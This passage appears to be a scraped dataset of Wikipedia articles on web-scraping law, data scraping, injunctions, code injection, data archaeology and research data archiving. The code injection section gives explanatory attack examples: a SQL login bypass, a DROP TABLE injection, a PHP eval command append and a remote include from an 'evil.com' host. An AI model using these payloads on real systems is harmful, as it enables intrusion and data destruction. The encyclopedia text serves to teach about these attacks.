to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
271 | https://en.wikipedia.org/wiki/Data_scraping | https://en.m.wikipedia.org/w/index.php?title=Data_scraping&mobileaction=toggle_view_mobile | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
272 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Injunction | An injunction is an equitable remedy a in the form of a special court order that compels a party to do or refrain from specific acts. 1 "When a court employs the extraordinary remedy of injunction, it directs the conduct of a party, and does so with the backing of its full coercive powers. 2 A party that fails to comply with an injunction faces criminal or civil penalties, including possible monetary sanctions and even imprisonment. They can also be charged with contempt of court. The injunction is an equitable remedy, 3 that is, a remedy that originated in the English courts of equity. Like other equitable remedies, it has traditionally been given when a wrong cannot be effectively remedied by an award of money damages. (The doctrine that reflects this is the requirement that an injunction can be given only when there is "no adequate remedy at law. ) Injunctions are intended to make whole again someone whose rights have been violated. Nevertheless, when deciding whether to grant an injunction, courts also take into account the interests of non-parties (that is, the public interest). When deciding whether to give an injunction, and deciding what its scope should be, courts give special attention to questions of fairness and good faith. One manifestation of this is that injunctions are subject to equitable defenses, such as laches and unclean hands. 4 Injunctions are given in many different kinds of cases. They can prohibit future violations of the law, such as trespass to real property, infringement of a patent, or the violation of a constitutional right (e.g., the free exercise of religion). Or they can require the defendant to repair past violations of the law. An injunction can require someone to do something, like clean up an oil spill or remove a spite fence. Or it can prohibit someone from doing something, like using an illegally obtained trade secret. An injunction that requires conduct is called a "mandatory injunction. An injunction that prohibits conduct is called a "prohibitory injunction. 5 Many injunctions are both—that is, they have both mandatory and prohibitory components, because they require some conduct and forbid other conduct. When an injunction is given, it can be enforced with equitable enforcement mechanisms such as contempt. 6 It can also be modified or dissolved (upon a proper motion to the court) if circumstances change in the future. 7 These features of the injunction allow a court granting one to manage the behavior of the parties. That is the most important distinction between the injunction and another non-monetary remedy in American law, the declaratory judgment. 8 Another way these two remedies are distinguished is that the declaratory judgment is sometimes available at an earlier point in a dispute than the injunction. 8 In the state of New South Wales, a court may grant an apprehended violence order (AVO) to a person who fears violence, harassment, abuse, or stalking. 9 The order prohibits the defendant from assaulting, harassing, threatening, stalking, or intimidating the person seeking the order. Other conditions may be included, such as a prohibition against contacting the person or attempting to find the person online. 10 A court may issue the order if it believes a person has reasonable grounds for their fears or has no reasonable grounds for their fears. Non-compliance may result in the imposition of a fine, imprisonment, or both, and deportation. Interim injunctions are a provisional form of injunctive relief, which can compel a party to do something (mandatory injunction) or stop it from doing something (prohibitory injunction). 11 A plaintiff seeking an interim injunction must establish that he is likely to succeed on the merits, that he is likely to suffer severe harm in the absence of preliminary relief, and that an injunction is in the public interest. 12 In Turkish law, interim injunction is an extraordinary remedy that is never awarded as of right. In each case, courts balance the competing claims of injury and consider the likely hardship on the defendant. 11 Injunctions have been especially important at two moments in American history. First, in the late nineteenth and early twentieth century, federal courts used injunctions to break strikes by unions. For example, after the United States government successfully used an injunction to outlaw the Pullman boycott in 1894 in In re Debs, employers found that they could obtain federal court injunctions to ban strikes and organizing activities of all kinds by unions. These injunctions were often extremely broad; one injunction issued by a federal court in the 1920s effectively barred the United Mine Workers of America from talking to workers who had signed yellow dog contracts with their employers. Unable to limit what they called "government by injunction" in the courts, labor and its allies persuaded the United States Congress in 1932 to pass the Norris-LaGuardia Act, which imposed so many procedural and substantive limits on the federal courts' power to issue injunctions that it effectively prohibited federal court from issuing injunctions in cases arising out of labor disputes. A number of states followed suit and enacted "Little Norris-LaGuardia Acts" that imposed similar limitations on state courts' powers. The courts have since recognized a limited exception to the Norris-LaGuardia Act's strict limitations in those cases in which a party seeks injunctive relief to enforce the grievance arbitration provisions of a collective bargaining agreement. Second, injunctions were crucial to the second half of the twentieth century in the desegregation of American schools. Federal courts gave injunctions that carried out the command of Brown v Board of Education to integrate public schools in the United States, and at times courts took over the management of public schools in order to ensure compliance. (An injunction that puts a court in the position of taking over and administering an institution—such as a school, a prison, or a hospital—is often called a "structural injunction".) Injunctions remain widely used to require government officials to comply with the Constitution, and they are also frequently used in private law disputes about intellectual property, real property, and contracts. Many state and federal statutes, including environmental statutes, civil rights statutes and employment-discrimination statutes, are enforced with injunctions. Injunctions in the United States tend to come in three main forms: temporary restraining orders, preliminary injunctions and permanent injunctions. 13 For both temporary restraining orders and preliminary injunctions, the goal is usually to preserve the status quo until the court is able to decide the case. A special kind of injunction that may be issued before trial is called a "temporary restraining order" or TRO. A TRO may be issued without notice to the other party or a hearing. A TRO will be given only for a short period of time before a court can schedule a hearing at which the restrained person may appear and contest the order. If the TRO is contested, the court must decide whether to issue a preliminary injunction. Temporary restraining orders are often, but not exclusively, given to prevent domestic violence, stalking, sexual assault, or harassment. Preliminary injunctions are given before trial. Because they are issued at an early stage, before the court has heard the evidence and made a decision in the case, they are more rarely given. The requirements for a preliminary injunction tend to be the same as for a permanent injunction, with the additional requirement that the party asking for the injunction is likely to succeed on the merits. 14 Permanent injunctions are issued after trial. Different federal and state courts sometimes have slightly different requirements for obtaining a permanent injunction. The Supreme Court enumerated the traditional four-factor test in eBay Inc. v. MercExchange, L.L.C. as: 15 16 The balance of hardships inquiry is also sometimes called the "undue hardship defense". 17 A stay pending appeal is a mechanism allowing a losing party to delay enforcement of an injunction while appeal is pending after final judgment has been granted by a lower court. 18 : 871 The DOJ and the FTC have investigated patent holders in the United States for seeking preliminary injunctions against accused infringers of standard-essential patents, or patents that the patent holder must license on reasonable and non-discriminatory terms. 19 There is an ongoing debate among legal and economic scholars with major implications for antitrust policy in the United States as well as in other countries over the statutory limits to the patent holder's right to seek and obtain injunctive relief against infringers of standard-essential patents. 20 Citing concerns of the absence of competition facing the patent holder once its technology is locked-in to the standard, some scholars argue that the holder of a standard-essential patent should face antitrust liability when seeking an injunction against an implementer of a standard. 21 Other scholars assert that patent holders are not contractually restrained from pursuing injunctions for standard-essential patent claims and that patent law is already capable of determining whether an injunction against an infringer of standard-essential patents will impose a net cost on consumers, thus obviating the role of antitrust enforcement. 22 Interim injunctions or interim orders are granted as a means of providing interim relief while a case is being heard, to prevent actions being implemented which potentially may be barred by a final ruling. 23 In England and Wales, injunctions whose existence and details may not be legally reported, in addition to facts or allegations which may not be disclosed, have been issued; they have been informally dubbed "super-injunctions". 24 25 An example was the super-injunction raised in September 2009 by Carter-Ruck solicitors on behalf of oil trader Trafigura, prohibiting the reporting of an internal Trafigura report into the 2006 Ivory Coast toxic waste dump scandal. The existence of the super-injunction was revealed only when it was referred to in a parliamentary question that was subsequently circulated on the Internet (parliamentary privilege protects statements by MPs in Parliament which would otherwise be held to be in contempt of court). Before it could be challenged in court, the injunction was varied to permit reporting of the question. 26 By long legal tradition, parliamentary proceedings may be reported without restriction. 27 Parliamentary proceedings are covered by absolute privilege, but the reporting of those proceedings in newspapers is only covered by qualified privilege. Another example of the use of a super-injunction was in a libel case in which a plaintiff who claimed he was defamed by family members in a dispute over a multimillion-pound family trust obtained anonymity for himself and for his relatives. 28 Roy Greenslade credits the former editor of The Guardian, Alan Rusbridger, with coining the word "super-injunction" in an article about the Trafigura affair in September 2009. 29 The term "hyper-injunction" has also been used to describe an injunction similar to a super-injunction but also including an order that the injunction must not be discussed with members of Parliament, journalists, or lawyers. One known hyper-injunction was obtained at the High Court in 2006, preventing its subject from saying that paint used in water tanks on passenger ships can break down and release potentially toxic chemicals. 30 This example became public knowledge in Parliament under parliamentary privilege. 31 By May 2011, Private Eye claimed to be aware of 53 super-injunctions and anonymised privacy injunctions, 32 though Lord Neuberger's report into the use of super-injunctions revealed that only two super-injunctions had been granted since January 2010. Many media sources were wrongly describing all gagging orders as super-injunctions. 33 The widespread media coverage of super-injunctions led to a drop in numbers after 2011; however four were granted in the first five months of 2015. 34 Injunctions defined by the European Commission as injunctions which can be issued for instance in cases in which materially the same website becomes available immediately after issuing the injunction with a different IP address or URL and which is drafted in a way that allows to also cover the new IP address or URL without the need for a new judicial procedure to obtain a new injunction. 35 An injunction described by the European Commission as allowing the repeated blocking of a website every time a live broadcast is in progress. These injunctions are generally used during live sporting events. 35 |
273 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Code_injection | Code injection is a class of computer security exploits in which a vulnerable computer program is tricked into misinterpreting external data as part of its code. An attacker thereby introduces (or "injects") code into the program and changes the course of its execution. The result of successful code injection can be disastrous, for example, by allowing computer viruses or computer worms to propagate. Code injection vulnerabilities occur when an application sends untrusted data to an interpreter. Injection flaws are most often found in SQL, LDAP, XPath, NoSQL queries, OS commands, XML parsers, SMTP headers, program arguments, etc. Injection flaws tend to be easier to discover when examining source code than via testing. 1 Scanners and fuzzers can help find injection flaws. 2 Injection can result in data loss or corruption, lack of accountability, or denial of access. Injection can sometimes lead to complete host takeover. Certain types of code injection are errors in interpretation, giving special meaning to user input. Similar interpretation errors exist outside the world of computer science such as the comedy routine "Who's on First? . In the routine, there is a failure to distinguish proper names from regular words. Likewise, in some types of code injection, there is a failure to distinguish user input from system commands. Code injection techniques are popular in system hacking or cracking to gain information, privilege escalation or unauthorized access to a system. Code injection can be used malevolently for many purposes, including: Code injection attacks in Internet of Things could also lead to severe consequences like data breaches and service disruption. 3 In 2008, 5.66% of all vulnerabilities reported that year were classified as code injection, the highest year on record. In 2015, this had decreased to 0.77%. 4 Code injection may be used with good intentions; for example, changing or tweaking the behavior of a program or system through code injection can cause the system to behave in a certain way without any malicious intent. 5 6 Code injection could, for example: Some users may unsuspectingly perform code injection because input they provide to a program was not considered by those who originally developed the system. For example: Another benign use of code injection could be the discovery of injection flaws themselves, with the intention of fixing these flaws. This is known as a white hat penetration test. To prevent code injection problems, utilize secure input and output handling, such as: The solutions listed above deal primarily with web-based injection of HTML or script code into a server-side application. Other approaches must be taken, however, when dealing with injection of user code on the user machine, resulting in privilege elevation attacks. Some approaches that are used to detect and isolate managed and unmanaged code injections are: SQL injection takes advantage of the syntax of SQL to inject malicious commands that can read or modify a database, or compromise the meaning of the original query. 13 For example, consider a web page that has two fields to allow users to enter a user name and a password. The code behind the page will generate a SQL query to check the password against the list of user names: If this query returns any rows, then access is granted. However, if the malicious user enters a valid Username and injects some valid code (password' OR '1' '1) in the Password field, then the resulting query will look like this: In the example above, "Password" is assumed to be blank or some innocuous string. '1' '1' will always be true and many rows will be returned, thereby allowing access. The technique may be refined to allow multiple statements to run, or even to load up and run external programs. Assume a query with the following format: If an adversary has the following for inputs: UserID: ;DROP TABLE User; Password: 'OR" the query will be parsed to be: The result is that the table User will be removed from the database. This occurs because the ; symbol signifies the end of one command and the start of a new one. signifies the start of a comment. Code injection is the malicious injection or introduction of code into an application. Some web servers have a guestbook script, which accepts small messages from users, and typically receives messages such as: However a malicious person may know of a code injection vulnerability in the guestbook, and enters a message such as: If another user views the page then the injected code will be executed. This code can allow the attacker to impersonate another user. However this same software bug can be accidentally triggered by an unassuming user which will cause the website to display bad HTML code. HTML and script injection is a popular subject, commonly termed "cross-site scripting" or "XSS". XSS refers to an injection flaw whereby user input to a web script or something along such lines is placed into the output HTML, without being checked for HTML code or scripting. Many of these problems are related to erroneous assumptions of what input data is possible, or the effects of special data. 14 Template engines are often used in modern Web application to display dynamic data. However, trusting non validated user data can frequently lead to critical vulnerabilities 15 such as Server Side Template Injections. While this vulnerability is similar to Cross-site scripting, template injection can be leverage to execute code on the web server rather than in a visitor's browser. It abuses a common workflow of web applications which often use user inputs and templates to render a web page. The example below shows the concept. Here the template visitor name is replaced with data during the rendering process. An attacker can use this workflow to inject code into the rendering pipeline by providing a malicious visitor name. Depending on the implementation of the web application, he could choose to inject 7 '7' which the renderer could resolve to Hello 7777777. Note that the actual web server has evaluated the malicious code and therefore could be vulnerable to Remote code execution. An eval() injection vulnerability occurs when an attacker can control all or part of an input string that is fed into an eval() function call. 16 The argument of "eval" will be processed as PHP, so additional commands can be appended. For example, if "arg" is set to "10; system( bin echo uh-oh') , additional code is run which executes a program on the server, in this case bin echo". PHP allows serialization and deserialization of whole objects. If untrusted input is allowed into the deserialization function, it is possible to overwrite existing classes in the program and execute malicious attacks. 17 Such an attack on Joomla was found in 2013. 18 Consider this PHP program (which includes a file specified by request): The example might be read as only color-files like blue.php and red.php could be loaded, while attackers might provide COLOR http: evil.com exploit causing PHP to load the external file. Format string bugs most commonly appear when a programmer wishes to print a string containing user supplied data. The programmer may mistakenly write printf(buffer) instead of printf( s", buffer). The first version interprets buffer as a format string, and parses any formatting instructions it may contain. The second version simply prints a string to the screen, as the programmer intended. Consider the following short C program that has a local variable char array password which holds a password; the program asks the user for an integer and a string, then echoes out the user-provided string. If the user input is filled with a list of format specifiers such as s s s s s s s s , then printf()will start reading from the stack. Eventually, one of the s format specifier will access the address of password , which is on the stack, and print Password1 to the screen. Shell injection (or command injection 19 ) is named after Unix shells, but applies to most systems which allow software to programmatically execute a command line. Here is an example vulnerable tcsh script: If the above is stored in the executable file . check, the shell command . check 1 ) evil" will attempt to execute the injected shell command evil instead of comparing the argument with the constant one. Here, the code under attack is the code that is trying to check the parameter, the very code that might have been trying to validate the parameter in order to defend against an attack. 20 Any function that can be used to compose and run a shell command is a potential vehicle for launching a shell injection attack. Among these are system(), StartProcess(), and System.Diagnostics.Process.Start(). Client server systems such as web browser interaction with web servers are potentially vulnerable to shell injection. Consider the following short PHP program that can run on a web server to run an external program called funnytext to replace a word the user sent with some other word. The passthru in the above composes a shell command that is then executed by the web server. Since part of the command it composes is taken from the URL provided by the web browser, this allows the URL to inject malicious shell commands. One can inject code into this program in several ways by exploiting the syntax of various shell features (this list is not exhaustive): 21 Some languages offer functions to properly escape or quote strings that are used to construct shell commands: However, this still puts the burden on programmers to know learn about these functions and to remember to make use of them every time they use shell commands. In addition to using these functions, validating or sanitizing the user input is also recommended. A safer alternative is to use APIs that execute external programs directly, rather than through a shell, thus preventing the possibility of shell injection. However, these APIs tend to not support various convenience features of shells, and or to be more cumbersome verbose compared to concise shell-syntax. |
274 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_archaeology | There are two conceptualisations of data archaeology, the technical definition and the social science definition. Data archaeology (also data archeology) in the technical sense refers to the art and science of recovering computer data encoded and or encrypted in now obsolete media or formats. Data archaeology can also refer to recovering information from damaged electronic formats after natural disasters or human error. It entails the rescue and recovery of old data trapped in outdated, archaic or obsolete storage formats such as floppy disks, magnetic tape, punch cards and transforming transferring that data to more usable formats. Data archaeology in the social sciences usually involves an investigation into the source and history of datasets and the construction of these datasets. It involves mapping out the entire lineage of data, its nature and characteristics, its quality and veracity and how these affect the analysis and interpretation of the dataset. The findings of performing data archaeology affect the level to which the conclusions parsed from data analysis can be trusted. 1 The term data archaeology originally appeared in 1993 as part of the Global Oceanographic Data Archaeology and Rescue Project (GODAR). The original impetus for data archaeology came from the need to recover computerised records of climatic conditions stored on old computer tape, which can provide valuable evidence for testing theories of climate change. These approaches allowed the reconstruction of an image of the Arctic that had been captured by the Nimbus 2 satellite on September 23, 1966, in higher resolution than ever seen before from this type of data. 2 NASA also utilises the services of data archaeologists to recover information stored on 1960s-era vintage computer tape, as exemplified by the Lunar Orbiter Image Recovery Project (LOIRP). 3 There is a distinction between data recovery and data intelligibility. One may be able to recover data but not understand it. For data archaeology to be effective, the data must be intelligible. 4 A term closely related to data archaeology is data lineage. The first step in performing data archaeology is an investigation into their data lineage. Data lineage entails the history of the data, its source and any alterations or transformations they have undergone. Data lineage can be found in the metadata of a dataset, the para data of a dataset or any accompanying identifiers (methodological guides etc). With data archaeology comes methodological transparency which is the level to which the data user can access the data history. The level of methodological transparency available determines not only how much can be recovered, but assists in knowing the data. Data lineage investigation involves what instruments were used, what the selection criteria are, the measurement parameters and the sampling frameworks. 1 In the socio-political manner, data archaeology involves the analysis of data assemblages to reveal their discursive and material socio-technical elements and apparatuses. This kind of analysis can reveal the politics of the data being analysed and thus that of their producing institution. Archaeology in this sense, refers to the provenance of data. It involves mapping the sites, formats and infrastructures through which data flows and are altered or transformed over time. it has an interest in the life of data, and the politics that shapes the circulation of data. This serves to expose the key actors, practices and praxes at play and their roles. It can be accomplished in two steps. First is, accessing and assessing the technical stack of the data (this refers to the infrastructure and material technologies used to build gather the data) to understand the physical representation of the data and also. Second, analysing the contextual stack of the data which shapes how the data is constructed, used and analysed. This can be done via a variety of processes, interviews, analysing technical and policy documents and investigating the effect of the data on a community or the institutional, financial, legal and material framing. This can be attained by creating a data assemblage 1 Data archaeology charts the way data moves across different sites and can sometimes encounter data friction. 5 Data archaeologists can also use data recovery after natural disasters such as fires, floods, earthquakes, or even hurricanes. For example, in 1995 during Hurricane Marilyn the National Media Lab assisted the National Archives and Records Administration in recovering data at risk due to damaged equipment. The hardware was damaged from rain, salt water, and sand, yet it was possible to clean some of the disks and refit them with new cases thus saving the data within. 4 When deciding whether or not to try and recover data, the cost must be taken into account. If there is enough time and money, most data will be able to be recovered. In the case of magnetic media, which are the most common type used for data storage, there are various techniques that can be used to recover the data depending on the type of damage. 4 : 17 Humidity can cause tapes to become unusable as they begin to deteriorate and become sticky. In this case, a heat treatment can be applied to fix this problem, by causing the oils and residues to either be reabsorbed into the tape or evaporate off the surface of the tape. However, this should only be done in order to provide access to the data so it can be extracted and copied to a medium that is more stable. 4 : 17 18 Lubrication loss is another source of damage to tapes. This is most commonly caused by heavy use, but can also be a result of improper storage or natural evaporation. As a result of heavy use, some of the lubricant can remain on the read-write heads which then collect dust and particles. This can cause damage to the tape. Loss of lubrication can be addressed by re-lubricating the tapes. This should be done cautiously, as excessive re-lubrication can cause tape slippage, which in turn can lead to media being misread and the loss of data. 4 : 18 Water exposure will damage tapes over time. This often occurs in a disaster situation. If the media is in salty or dirty water, it should be rinsed in fresh water. The process of cleaning, rinsing, and drying wet tapes should be done at room temperature in order to prevent heat damage. Older tapes should be recovered prior to newer tapes, as they are more susceptible to water damage. 4 : 18 The next step (after investigating the data lineage) is to establish what counts as good data and bad data to ensure that only the 'good' data gets migrated to the new data warehouse or repository. A good example of bad data is 'test data' in the technical data sense is test data. To prevent the need of data archaeology, creators and holders of digital documents should take care to employ digital preservation. Another effective preventive measure is the use of offshore backup facilities that could not be affected should a disaster occur. From these backup servers, copies of the lost data could easily be retrieved. A multi-site and multi-technique data distribution plan is advised for optimal data recovery, especially when dealing with big data. TCP IP method, snapshot recovery, mirror sites and tapes safeguarding data in a private cloud are also all good preventive methods. Daily transferring data from their mirror sites to the emergency servers. 6 |
275 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_library | Research data archiving is the long-term storage of scholarly research data, including the natural sciences, social sciences, and life sciences. The various academic journals have differing policies regarding how much of their data and methods researchers are required to store in a public archive, and what is actually archived varies widely between different disciplines. Similarly, the major grant-giving institutions have varying attitudes towards public archiving of data. In general, the tradition of science has been for publications to contain sufficient information to allow fellow researchers to replicate and therefore test the research. In recent years this approach has become increasingly strained as research in some areas depends on large datasets which cannot easily be replicated independently. Data archiving is more important in some fields than others. In a few fields, all of the data necessary to replicate the work is already available in the journal article. In drug development, a great deal of data is generated and must be archived so researchers can verify that the reports the drug companies publish accurately reflect the data. The requirement of data archiving is a recent development in the history of science. It was made possible by advances in information technology allowing large amounts of data to be stored and accessed from central locations. For example, the American Geophysical Union (AGU) adopted their first policy on data archiving in 1993, about three years after the beginning of the WWW. 1 This policy mandates that datasets cited in AGU papers must be archived by a recognised data center; it permits the creation of "data papers"; and it establishes AGU's role in maintaining data archives. But it makes no requirements on paper authors to archive their data. Prior to organized data archiving, researchers wanting to evaluate or replicate a paper would have to request data and methods information from the author. The academic community expects authors to share supplemental data. This process was recognized as wasteful of time and energy and obtained mixed results. Information could become lost or corrupted over the years. In some cases, authors simply refuse to provide the information. The need for data archiving and due diligence is greatly increased when the research deals with health issues or public policy formation. 2 3 Biotropica requires, as a condition for publication, that the data supporting the results in the paper and metadata describing them must be archived in an appropriate public archive such as Dryad, Figshare, GenBank, TreeBASE, or NCBI. Authors may elect to make the data publicly available as soon as the article is published or, if the technology of the archive allows, embargo access to the data up to three years after article publication. A statement describing Data Availability will be included in the manuscript as described in the instructions to authors. Exceptions to the required archiving of data may be granted at the discretion of the Editor-in-Chief for studies that include sensitive information (e.g., the location of endangered species). Our Editorial explaining the motivation for this policy can be found here. A more comprehensive list of data repositories is available here. Promoting a culture of collaboration with researchers who 